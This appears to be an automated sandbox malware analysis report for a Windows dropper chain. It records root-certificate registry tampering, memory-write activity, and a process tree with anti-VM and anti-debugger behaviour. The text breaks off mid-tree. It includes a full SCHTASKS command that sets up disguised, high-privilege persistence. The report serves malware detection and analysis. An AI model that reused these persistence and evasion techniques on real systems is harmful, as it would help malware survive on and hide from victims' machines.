9018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e futors.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e futors.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 970d7d5d87.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 970d7d5d87.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 1be2e64926.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 1be2e64926.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 futors.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e futors.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 970d7d5d87.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2036 schtasks.exe 1564 schtasks.exe 1692 SCHTASKS.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1544 d9f00ea479721f7581810bda98dca097.exe 2832 rapes.exe 2992 UD49QH6.exe 2992 UD49QH6.exe 2992 UD49QH6.exe 2992 UD49QH6.exe 2992 UD49QH6.exe 1540 powershell.exe 2520 cronikxqqq.exe 2520 cronikxqqq.exe 2520 cronikxqqq.exe 2520 cronikxqqq.exe 1540 powershell.exe 1540 powershell.exe 2836 powershell.exe 2576 TempCRLQ2NAU2BD8ZLD3CXGHLFXLOGTOOHPW.EXE 2604 powershell.exe 980 powershell.exe 300 powershell.exe 2932 970d7d5d87.exe 300 powershell.exe 300 powershell.exe 2088 483d2fa8a0d53818306efeb32d3.exe 1368 2be00504eb.exe 2796 crypted.exe 2796 crypted.exe 2796 crypted.exe 2796 crypted.exe 2372 bbc9d61153.exe 2372 bbc9d61153.exe 2372 bbc9d61153.exe 3416 00e7be516b.exe 3416 00e7be516b.exe 3628 7db14a892a.exe 3628 7db14a892a.exe 3416 00e7be516b.exe 3416 00e7be516b.exe 3848 7a4262cb0d.exe 3848 7a4262cb0d.exe 3848 7a4262cb0d.exe 4024 1be2e64926.exe 4024 1be2e64926.exe 4024 1be2e64926.exe 2364 f96225d44f.exe 2364 f96225d44f.exe 2364 f96225d44f.exe 3480 UD49QH6.exe 3480 UD49QH6.exe 3480 UD49QH6.exe 3480 UD49QH6.exe 3480 UD49QH6.exe 3480 UD49QH6.exe 3480 UD49QH6.exe 4024 1be2e64926.exe 4024 1be2e64926.exe 4024 1be2e64926.exe 4024 1be2e64926.exe 3648 HmngBpR.exe 3648 HmngBpR.exe 3600 SplashWin.exe 3612 SplashWin.exe 3612 SplashWin.exe 3612 SplashWin.exe 2364 cmd.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 3612 SplashWin.exe 2364 cmd.exe -
Suspicious use of AdjustPrivilegeToken 15 IoCs
description pid Process Token: SeDebugPrivilege 1540 powershell.exe Token: SeDebugPrivilege 1704 cronikxqqq.exe Token: SeDebugPrivilege 2836 powershell.exe Token: SeDebugPrivilege 2604 powershell.exe Token: SeDebugPrivilege 980 powershell.exe Token: SeDebugPrivilege 300 powershell.exe Token: SeDebugPrivilege 1424 taskkill.exe Token: SeDebugPrivilege 1544 taskkill.exe Token: SeDebugPrivilege 1972 taskkill.exe Token: SeDebugPrivilege 2692 taskkill.exe Token: SeDebugPrivilege 2104 taskkill.exe Token: SeDebugPrivilege 2864 firefox.exe Token: SeDebugPrivilege 2864 firefox.exe Token: SeDebugPrivilege 3416 00e7be516b.exe Token: SeDebugPrivilege 4032 Bkzpa.exe -
Suspicious use of FindShellTrayWindow 20 IoCs
pid Process 1544 d9f00ea479721f7581810bda98dca097.exe 1784 amnew.exe 3004 36fe0958ef.exe 3004 36fe0958ef.exe 3004 36fe0958ef.exe 2372 bbc9d61153.exe 2372 bbc9d61153.exe 2372 bbc9d61153.exe 2372 bbc9d61153.exe 2372 bbc9d61153.exe 2372 bbc9d61153.exe 2864 firefox.exe 2864 firefox.exe 2864 firefox.exe 2864 firefox.exe 2372 bbc9d61153.exe 2372 bbc9d61153.exe 2372 bbc9d61153.exe 2372 bbc9d61153.exe 1668 zY9sqWs.exe -
Suspicious use of SendNotifyMessage 16 IoCs
pid Process 3004 36fe0958ef.exe 3004 36fe0958ef.exe 3004 36fe0958ef.exe 2372 bbc9d61153.exe 2372 bbc9d61153.exe 2372 bbc9d61153.exe 2372 bbc9d61153.exe 2372 bbc9d61153.exe 2372 bbc9d61153.exe 2864 firefox.exe 2864 firefox.exe 2864 firefox.exe 2372 bbc9d61153.exe 2372 bbc9d61153.exe 2372 bbc9d61153.exe 2372 bbc9d61153.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3648 HmngBpR.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1544 wrote to memory of 2832 1544 d9f00ea479721f7581810bda98dca097.exe 31 PID 1544 wrote to memory of 2832 1544 d9f00ea479721f7581810bda98dca097.exe 31 PID 1544 wrote to memory of 2832 1544 d9f00ea479721f7581810bda98dca097.exe 31 PID 1544 wrote to memory of 2832 1544 d9f00ea479721f7581810bda98dca097.exe 31 PID 2832 wrote to memory of 1784 2832 rapes.exe 33 PID 2832 wrote to memory of 1784 2832 rapes.exe 33 PID 2832 wrote to memory of 1784 2832 rapes.exe 33 PID 2832 wrote to memory of 1784 2832 rapes.exe 33 PID 1784 wrote to memory of 768 1784 amnew.exe 34 PID 1784 wrote to memory of 768 1784 amnew.exe 34 PID 1784 wrote to memory of 768 1784 amnew.exe 34 PID 1784 wrote to memory of 768 1784 amnew.exe 34 PID 2832 wrote to memory of 2992 2832 rapes.exe 36 PID 2832 wrote to memory of 2992 2832 rapes.exe 36 PID 2832 wrote to memory of 2992 2832 rapes.exe 36 PID 2832 wrote to memory of 2992 2832 rapes.exe 36 PID 2832 wrote to memory of 1424 2832 rapes.exe 38 PID 2832 wrote to memory of 1424 2832 rapes.exe 38 PID 2832 wrote to memory of 1424 2832 rapes.exe 38 PID 2832 wrote to memory of 1424 2832 rapes.exe 38 PID 768 wrote to memory of 2188 768 futors.exe 39 PID 768 wrote to memory of 2188 768 futors.exe 39 PID 768 wrote to memory of 2188 768 futors.exe 39 PID 768 wrote to memory of 2188 768 futors.exe 39 PID 2188 wrote to memory of 2688 2188 trano1221.exe 40 PID 2188 wrote to memory of 2688 2188 trano1221.exe 40 PID 2188 wrote to memory of 2688 2188 trano1221.exe 40 PID 2832 wrote to memory of 3004 2832 rapes.exe 41 PID 2832 wrote to memory of 3004 2832 rapes.exe 41 PID 2832 wrote to memory of 3004 2832 rapes.exe 41 PID 2832 wrote to memory of 3004 2832 rapes.exe 41 PID 3004 wrote to memory of 2704 3004 36fe0958ef.exe 42 PID 3004 wrote to memory of 2704 3004 36fe0958ef.exe 42 PID 3004 wrote to memory of 2704 3004 36fe0958ef.exe 42 PID 3004 wrote to memory of 2704 3004 36fe0958ef.exe 42 PID 3004 wrote to memory of 2444 3004 36fe0958ef.exe 44 PID 3004 wrote to memory of 2444 3004 36fe0958ef.exe 44 PID 3004 wrote to memory of 2444 3004 36fe0958ef.exe 44 PID 3004 wrote to memory of 2444 3004 36fe0958ef.exe 44 PID 2704 wrote to memory of 2036 2704 cmd.exe 45 PID 2704 wrote to memory of 2036 2704 cmd.exe 45 PID 2704 wrote to memory of 2036 2704 cmd.exe 45 PID 2704 wrote to memory of 2036 2704 cmd.exe 45 PID 2444 wrote to memory of 1540 2444 mshta.exe 46 PID 2444 wrote to memory of 1540 2444 mshta.exe 46 PID 2444 wrote to memory of 1540 2444 mshta.exe 46 PID 2444 wrote to memory of 1540 2444 mshta.exe 46 PID 768 wrote to memory of 1704 768 futors.exe 48 PID 768 wrote to memory of 1704 768 futors.exe 48 PID 768 wrote to memory of 1704 768 futors.exe 48 PID 768 wrote to memory of 1704 768 futors.exe 48 PID 2832 wrote to memory of 1852 2832 rapes.exe 49 PID 2832 wrote to memory of 1852 2832 rapes.exe 49 PID 2832 wrote to memory of 1852 2832 rapes.exe 49 PID 2832 wrote to memory of 1852 2832 rapes.exe 49 PID 1852 wrote to memory of 1932 1852 cmd.exe 51 PID 1852 wrote to memory of 1932 1852 cmd.exe 51 PID 1852 wrote to memory of 1932 1852 cmd.exe 51 PID 1852 wrote to memory of 1932 1852 cmd.exe 51 PID 1704 wrote to memory of 796 1704 cronikxqqq.exe 52 PID 1704 wrote to memory of 796 1704 cronikxqqq.exe 52 PID 1704 wrote to memory of 796 1704 cronikxqqq.exe 52 PID 1704 wrote to memory of 796 1704 cronikxqqq.exe 52 PID 1704 wrote to memory of 1580 1704 cronikxqqq.exe 53 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\d9f00ea479721f7581810bda98dca097.exe"C:\Users\Admin\AppData\Local\Temp\d9f00ea479721f7581810bda98dca097.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Users\Admin\AppData\Local\Temp\10234920101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10234920101\amnew.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"4⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:768 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2688
-
-
-
C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"6⤵
- Executes dropped EXE
PID:796
-
-
C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"6⤵
- Executes dropped EXE
PID:1580
-
-
C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"6⤵
- Executes dropped EXE
PID:992
-
-
C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2520
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1704 -s 5366⤵
- Loads dropped DLL
- Program crash
PID:1976
-
-
-
C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe"C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1036 -
C:\Windows\SysWOW64\SCHTASKS.exeSCHTASKS /Create /SC MINUTE /MO 5 /TN "XblGameSave\XblGameSvTask" /TR "C:\Users\Admin\AppData\Roaming\HexRays\frameapphost.exe" /F /RL HIGHEST6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1692
-
-
-
C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"5⤵
- Executes dropped EXE
PID:1680 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1680 -s 366⤵
- Loads dropped DLL
PID:2172
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe"C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe"5⤵
- Executes dropped EXE
PID:2752 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2752 -s 366⤵
- Loads dropped DLL
PID:1536
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1696 -
